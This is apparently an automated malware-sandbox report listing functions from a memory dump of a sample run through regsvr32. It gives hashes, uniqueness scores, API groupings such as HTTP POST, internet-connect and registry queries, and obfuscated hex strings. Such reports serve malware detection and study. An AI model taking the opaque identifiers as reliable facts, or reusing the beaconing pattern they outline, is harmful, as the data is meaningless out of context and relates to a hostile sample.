                                                                                                                • Opcode Fuzzy Hash: 2ea32b6012aa963e30e036a40d0186dd1f2715e2be965862b184367db17ea51d
                                                                                                                • Instruction Fuzzy Hash: F00274A2B2478185EF00DBB8D4847AD2361FB457E8F945235EA6D57ADADFBCE184C300
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 100.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: Internet$CloseHandle$HttpOpenRequest_invalid_parameter_noinfo_noreturn$ConnectErrorLastSend
                                                                                                                • String ID: 8817a87579e4dcadedcbc9a460d07dfbc5bd6f7366ee53d109ec1591d95e4adf334b9492cb61e964b843a4306b9bb123c5e478366ff3198044af27f3e35f47eb06$HTTP/1.1$POST
                                                                                                                • API String ID: 2032937867-3540460043
                                                                                                                • Opcode ID: 1962b22099194d597740632e345c2d5adc0888ccc832e9fd3efc19488b262b62
                                                                                                                • Instruction ID: 4cf268a93218e76211ca7e7848d6d47c77260f32fac6869f7a24e61ba0631dfa
                                                                                                                • Opcode Fuzzy Hash: 1962b22099194d597740632e345c2d5adc0888ccc832e9fd3efc19488b262b62
                                                                                                                • Instruction Fuzzy Hash: 06A137B2A1878181EA10DF95E488B6E6361FB847D4FC44139DA9E9BB94DFBCF048C300
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 100.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: _invalid_parameter_noinfo_noreturn$File$CloseErrorHandleLastReadSize
                                                                                                                • String ID: %06d$-XXXXXX$end
                                                                                                                • API String ID: 3471299532-1274570585
                                                                                                                • Opcode ID: 0ecef74563c24b76a9510df852a630ee0f49f1fc8c46ff54d3a307185c111e6e
                                                                                                                • Instruction ID: 4b288c3f18f362154c328070fcc2d34b1cea6ac1a0db5818122da16bd436a40d
                                                                                                                • Opcode Fuzzy Hash: 0ecef74563c24b76a9510df852a630ee0f49f1fc8c46ff54d3a307185c111e6e
                                                                                                                • Instruction Fuzzy Hash: 5FF1D4A2B1478185EB00DBB4E584BAD2765FB44798F848139DF5E976E9DFBCE088C340
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 100.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                • a7b2e3dcbd563607bcb20621dc9ed30be13cb30bd3f78ce436ed9fd17f, xrefs: 00007FF983D97543
                                                                                                                • a5447b3d1d5061d1218efa5828cda002f0c7deaedce2ea4f01fd, xrefs: 00007FF983D97619
                                                                                                                • 980245d50706ff3f0ed2ada3505e009dcbaa9d2d4f2795c5a51ec70b29, xrefs: 00007FF983D9746D
                                                                                                                • 8d97e5df64af8f0f887abdaf70bd9d03c634a8151ed02d46839645838755ba, xrefs: 00007FF983D97397
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                • String ID: 8d97e5df64af8f0f887abdaf70bd9d03c634a8151ed02d46839645838755ba$980245d50706ff3f0ed2ada3505e009dcbaa9d2d4f2795c5a51ec70b29$a5447b3d1d5061d1218efa5828cda002f0c7deaedce2ea4f01fd$a7b2e3dcbd563607bcb20621dc9ed30be13cb30bd3f78ce436ed9fd17f
                                                                                                                • API String ID: 3668304517-3861941003
                                                                                                                • Opcode ID: dcbc1d0d61e6cf4f19e61c4b91773fdb4256cb8feeb72cb799fe0adb705ec7bf
                                                                                                                • Instruction ID: 35891543b5e14f025dfab1cdd8c80adc1ca3c090b72ce9248171c09c2bf3b50d
                                                                                                                • Opcode Fuzzy Hash: dcbc1d0d61e6cf4f19e61c4b91773fdb4256cb8feeb72cb799fe0adb705ec7bf
                                                                                                                • Instruction Fuzzy Hash: 62A151A2F2465184EF00DBB9D884BAD2271BB457A8F845239DE6D67BD9DFBCE045C300
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 100.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                • 6946c029658aeafbefbfdd428c47bd03390da2e6f30da83d815be5d22c0ef7918ba6125441, xrefs: 00007FF983D92853
                                                                                                                • 2c92cd0a32f60eb714d48bd63b6ea2027fa2297712a5f90b43da388dc4c5147933d5441942dab0680bac7beea0bc6c0b49af345b1b9ef9215bd308b1e6e1204b02, xrefs: 00007FF983D92651
                                                                                                                • 772ccc659ff2577755bb035e0fb604fb3477d5c339a586a186523c12699dfc6f7923868c61d2e1fbc712, xrefs: 00007FF983D9275D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: _invalid_parameter_noinfo_noreturn$QueryValue$ErrorLast
                                                                                                                • String ID: 2c92cd0a32f60eb714d48bd63b6ea2027fa2297712a5f90b43da388dc4c5147933d5441942dab0680bac7beea0bc6c0b49af345b1b9ef9215bd308b1e6e1204b02$6946c029658aeafbefbfdd428c47bd03390da2e6f30da83d815be5d22c0ef7918ba6125441$772ccc659ff2577755bb035e0fb604fb3477d5c339a586a186523c12699dfc6f7923868c61d2e1fbc712
                                                                                                                • API String ID: 1514591853-3244201323
                                                                                                                • Opcode ID: 41b2c277796afe2fbe0477f863e8f40f8ced0261d32e2ace28fa52c7208038d3
                                                                                                                • Instruction ID: 9464393a5042cf0c24e40ac7b8de82c35cc1cb0f89f1c2bd8654d710d7c63e02
                                                                                                                • Opcode Fuzzy Hash: 41b2c277796afe2fbe0477f863e8f40f8ced0261d32e2ace28fa52c7208038d3
                                                                                                                • Instruction Fuzzy Hash: EEA181B2B15645D9EF00DFB4D4847AC63A1FB447A8F845239EA1DA7AD9DEBCE148C300
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 100.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: File$HandleInformationType
                                                                                                                • String ID:
                                                                                                                • API String ID: 4064226416-0
                                                                                                                • Opcode ID: 118d8c8630ed92c64839bc6533c11c5e4767b421fb3f9fbdd04b5870c2c07e76
                                                                                                                • Instruction ID: 4da7600b91e6d3b227b1616ce80b4e7ebfef6eba285b636c26fc7e0426da49cd
                                                                                                                • Opcode Fuzzy Hash: 118d8c8630ed92c64839bc6533c11c5e4767b421fb3f9fbdd04b5870c2c07e76
                                                                                                                • Instruction Fuzzy Hash: FE717C66F08A4296EB64CBA5E450BBD2761BB44788F844139CE0EA7B58DF7CE44DC740
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 100.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: _invalid_parameter_noinfo_noreturn$Internet$CloseConnectErrorHandleLast
                                                                                                                • String ID:
                                                                                                                • API String ID: 1311304170-0
                                                                                                                • Opcode ID: 62952b3b0ea731a52ba3ec55b09d3b976416c0f1d36efe0620873190e67255c5
                                                                                                                • Instruction ID: 0158f42d9ff77c23bb17b3e7ed4d952bcdb7713165a4701ea335e42c4cb0ff2b
                                                                                                                • Opcode Fuzzy Hash: 62952b3b0ea731a52ba3ec55b09d3b976416c0f1d36efe0620873190e67255c5
                                                                                                                • Instruction Fuzzy Hash: 7A81A2B2A18B8692EB10CF55E144B697364FB84B84F844139DB8E97BA4DFBCF548C700
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 100.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: _invalid_parameter_noinfo_noreturn$ExistsFilePath
                                                                                                                • String ID: 2a812beda6215ee45decbe4eac3e4bb84ca1eb61b4
                                                                                                                • API String ID: 1784296113-4103206974
                                                                                                                • Opcode ID: f925b9cf7aa9d4eb31493bf1343f0fbf641fd16e957abffaf829a827274d5a9b
                                                                                                                • Instruction ID: 85e67ecc7a0bfe15dae5af6cc59afefd13c1d93960b2e3eb44cc1511eb8884ac
                                                                                                                • Opcode Fuzzy Hash: f925b9cf7aa9d4eb31493bf1343f0fbf641fd16e957abffaf829a827274d5a9b
                                                                                                                • Instruction Fuzzy Hash: BEA188A2B1878181EB00DBA4D5857AD2375FB447A4F845239DA5D67BEADFBCF085C300
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 100.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                • String ID: f$p$p
                                                                                                                • API String ID: 3215553584-1995029353
                                                                                                                • Opcode ID: 96265779a74d23ee4f786bbc3fc76276f1c1c8c7f57204478137a464cfd8e5d3
                                                                                                                • Instruction ID: 053f3a01ea507fe05ae357d12d2c412052e27a1af5f505f4bd4fa9add589164a
                                                                                                                • Opcode Fuzzy Hash: 96265779a74d23ee4f786bbc3fc76276f1c1c8c7f57204478137a464cfd8e5d3
                                                                                                                • Instruction Fuzzy Hash: 3512A2A1A2814285FB20DAB59054B79B291FB40760FDC4139E79BA77D4CBBCF59BCB00
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 100.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                • String ID:
                                                                                                                • API String ID: 3215553584-0
                                                                                                                • Opcode ID: 7d3a1680c31bdb7de5cbb8a2c8d8483a96df4d4faee7dc13bf721ef28b18e177
                                                                                                                • Instruction ID: 7270dfeb59be2901b4876cd8903de1c95c06ecb7b525e64acc2b6544a06943cf
                                                                                                                • Opcode Fuzzy Hash: 7d3a1680c31bdb7de5cbb8a2c8d8483a96df4d4faee7dc13bf721ef28b18e177
                                                                                                                • Instruction Fuzzy Hash: 03C1B6A2A1864252E6A1DBA59440BBD7664FB41B80FCD0139DA4FA7796CFBCF45AC300
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 0.14%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                • String ID: api-ms-
                                                                                                                • API String ID: 2559590344-2084034818
                                                                                                                • Opcode ID: d713b68e8c60dd4c067ce1d1295b3b36c6977fd0372db4fecd4fbe35366fa0a0
                                                                                                                • Instruction ID: 9619abb2863cade10ccc46b94dbb7acf43f318df08a48777b20293e64db39781
                                                                                                                • Opcode Fuzzy Hash: d713b68e8c60dd4c067ce1d1295b3b36c6977fd0372db4fecd4fbe35366fa0a0
                                                                                                                • Instruction Fuzzy Hash: 94318565A1AA4195EE12DF92A800B7523A4BF48B90F9D4539DD1EAB390DFFCF449C304
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 23.02%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: FileRead$CloseHandle
                                                                                                                • String ID:
                                                                                                                • API String ID: 1447241488-0
                                                                                                                • Opcode ID: cea947035d5da50d5a08a5e159c4dea3f3bc1cd775c274a9c44751817637697c
                                                                                                                • Instruction ID: 10a1307f32e52116614d04c91e08cf1e7baaf95fc1ac4441ae478784757fec99
                                                                                                                • Opcode Fuzzy Hash: cea947035d5da50d5a08a5e159c4dea3f3bc1cd775c274a9c44751817637697c
                                                                                                                • Instruction Fuzzy Hash: DE518BB2604B8196EB24DF16E444BAA73A0F749B90F840239DF9E97BA5CF7DE154C700
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 100.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: File$CloseHandleView$CreateMappingUnmapWrite
                                                                                                                • String ID:
                                                                                                                • API String ID: 2825254369-0
                                                                                                                • Opcode ID: 0f841c4d75cbbbbfb0e524c01365c58ca16adf2a6ed010f2494a28141108e93d
                                                                                                                • Instruction ID: 7b7ed621034546ae8fe700a84a243379b40d960b005fd992fed143a3d6192e3c
                                                                                                                • Opcode Fuzzy Hash: 0f841c4d75cbbbbfb0e524c01365c58ca16adf2a6ed010f2494a28141108e93d
                                                                                                                • Instruction Fuzzy Hash: A131B3B2714A4186EB50CF66E810A2D77A1FB88B94B994138DE4F97B54DF3CE809CB00
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 10.55%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: Is_bad_exception_allowedstd::bad_alloc::bad_alloc
                                                                                                                • String ID: csm$csm$csm
                                                                                                                • API String ID: 3523768491-393685449
                                                                                                                • Opcode ID: 8f5fb88e19f09e891755cc34d9c09c28d9da866de10edde2dc5b90626e53bdad
                                                                                                                • Instruction ID: 15a71e17ee9f72841a79012ec9184134882edb08a632682d9b6b1680982bb92a
                                                                                                                • Opcode Fuzzy Hash: 8f5fb88e19f09e891755cc34d9c09c28d9da866de10edde2dc5b90626e53bdad
                                                                                                                • Instruction Fuzzy Hash: 57E1B7B2A086818AE710DFB4D4407BD3BA4FB45748F994139DA8EAB655CF7CF58AC700
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 100.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: DirectoryInformationVolumeWindows_invalid_parameter_noinfo_noreturn
                                                                                                                • String ID: %08x$:
                                                                                                                • API String ID: 2791136463-521886738
                                                                                                                • Opcode ID: 1927aa9b70cdef16a7e46721eaff72b9ab61702ff506970b605c501a55f200f0
                                                                                                                • Instruction ID: 9815646313d56039358a814d15ff9585622b99eac1fbf39ee59b2bd4639d9a55
                                                                                                                • Opcode Fuzzy Hash: 1927aa9b70cdef16a7e46721eaff72b9ab61702ff506970b605c501a55f200f0
                                                                                                                • Instruction Fuzzy Hash: 9841A5B26187C182EB10CBA5F44576EB3A1FB94784F84513ADA8D97B99DFBCE144C700
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 100.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: ConsoleWrite$CloseErrorHandleLast
                                                                                                                • String ID: CONOUT$
                                                                                                                • API String ID: 2157184327-3130406586
                                                                                                                • Opcode ID: 28f2fa734d7ccc3dddc565c47868e86e43f984ec65021d028519876cc06df68c
                                                                                                                • Instruction ID: 067f71680d04afb4508a4199dacc69e2f0caf451504c0cdc3c2d93bee33d5e00
                                                                                                                • Opcode Fuzzy Hash: 28f2fa734d7ccc3dddc565c47868e86e43f984ec65021d028519876cc06df68c
                                                                                                                • Instruction Fuzzy Hash: 6611B462618A4186E751DB96F85473577A0FB88BE1F890238D95ED3B94CFBCE918CB00
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 100.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                • String ID: CorExitProcess$mscoree.dll
                                                                                                                • API String ID: 4061214504-1276376045
                                                                                                                • Opcode ID: 6742bacbe83848064711b71b8582e27c51499afce27943f895093a7b44629738
                                                                                                                • Instruction ID: c2d36cabcae9ce411ca3e31ff6c2b58f831833e9c1bd06329c81393863980b77
                                                                                                                • Opcode Fuzzy Hash: 6742bacbe83848064711b71b8582e27c51499afce27943f895093a7b44629738
                                                                                                                • Instruction Fuzzy Hash: 74F03AA2B2964281EF58CBA1E480BB82B60FF48745F8D143DE54F96264CFACF58DC700
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 100.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_task
                                                                                                                • String ID:
                                                                                                                • API String ID: 3936042273-0
                                                                                                                • Opcode ID: 49e10ca27ae9f0807598c193127893af1a13b6e757e9e96599b6ecf55619f3d7
                                                                                                                • Instruction ID: c8ac2e1297f590838f29fc52d49ac364fbb5b4479f745420207ea664551aa861
                                                                                                                • Opcode Fuzzy Hash: 49e10ca27ae9f0807598c193127893af1a13b6e757e9e96599b6ecf55619f3d7
